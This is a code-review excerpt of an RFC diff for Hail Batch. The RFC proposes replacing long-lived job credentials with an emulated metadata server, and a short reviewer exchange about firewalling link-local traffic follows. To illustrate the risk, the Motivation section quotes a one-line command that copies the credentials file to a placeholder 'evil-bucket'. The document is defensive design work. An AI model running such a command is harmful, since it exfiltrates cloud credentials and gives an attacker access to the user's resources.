rfc/0000-keyless-job-auth.rst

```diff
@@ -0,0 +1,204 @@
+human identity. Inside a Batch job running in the cloud, the job is running as a
+Hail-managed identity created for that user on signup. We will refer to this
+identities as the user's Human Identity and the Robot Identity, respectively.
+
+In the current system, Batch jobs are given access to the users' robot identity
+through a file planted in the job's filesystem containing the identity's
+credentials. In GCP, the credentials are a GSA key file. In Azure, the credentials
+are a username/password for a AAD Service Principal. These credentials are created,
+stored, and rotated by the Hail Batch system. 
+
+
+Motivation
+----------
+
+Exposing long-lived credentials to user jobs poses a security risk,
+as these credentials could be easily exfiltrated by the user or any malicious
+code the user inadvertantly runs. The following is all that needs to run to
+exfiltrate these credentials.
+
+.. code-block:: python
+   j.command('gcloud storage cp $GOOGLE_APPLICATION_CREDENTIALS gs://evil-bucket/')
+
+Hail operators rotate GSA keys quarterly, so such an exfiltration could provide
+a malicious actor access to all resources granted to the robot identity for up
+to 90 days.
+
+Cloud providers avoid persisting long-lived credentials on user machines through
+the Metadata Server interface, an HTTP endpoint available on a
+`link-local https://en.wikipedia.org/wiki/Link-local_address`_ address which can
+issue access tokens for the identity assigned to the virtual machine. Available
+metadata in GCP is described [here](https://cloud.google.com/compute/docs/metadata/predefined-metadata-keys). This interface has the following advantages:
+
+- Unlike long-lived keys, these tokens are short-lived (e.g. 1 hour), reducing
+  the potential attack window following exfiltration.
+- The metadata server can be configured only to issue certain scopes, so the
+  operations a job can perform may be restricted. It is not possible to scope
+  GSA keys and AAD SP client secrets.
+
+This proposal seeks to provide an emulated metadata server to Batch jobs and remove
+jobs' dependence on long-lived credentials.
+
+Removing this dependency also opens the door to future work of removing
+long-lived credentials entirely from the system in favor of alternative approaches
+to gaining access tokens from the cloud identity providers (discussed briefly 
+in Inspiration & Alternatives).
+
+
+Proposed Change Specification
+-----------------------------
+
+Batch jobs access credentials on the filesystem through the
+``$GOOGLE_APPLICATION_CREDENTIALS``/``$AZURE_APPLICATION_CREDENTIALS``
+environment variables (EVs). Under this change, the files and EVs will still be
+available but their use will be deprecated in the documentation.
+
+Currently, Batch uses firewall rules to block access to the metadata server for
+user jobs, permitting users access would allow them to impersonate the batch worker.
+This proposal would allow packets from jobs destined to ``169.254.169.254`` but
```

Comment:
It occurs to me, and I don't know if this is feasible, that it'd be great if we could somehow say that any packets leaving the VM either (a) are not destined for 169.254.0.0/16 OR they originated from the batch worker process.

Reply:
I imagine we could cook this up in `iptables`, but I would maybe want to look first to see if that makes sense. Where would those packets even get routed to?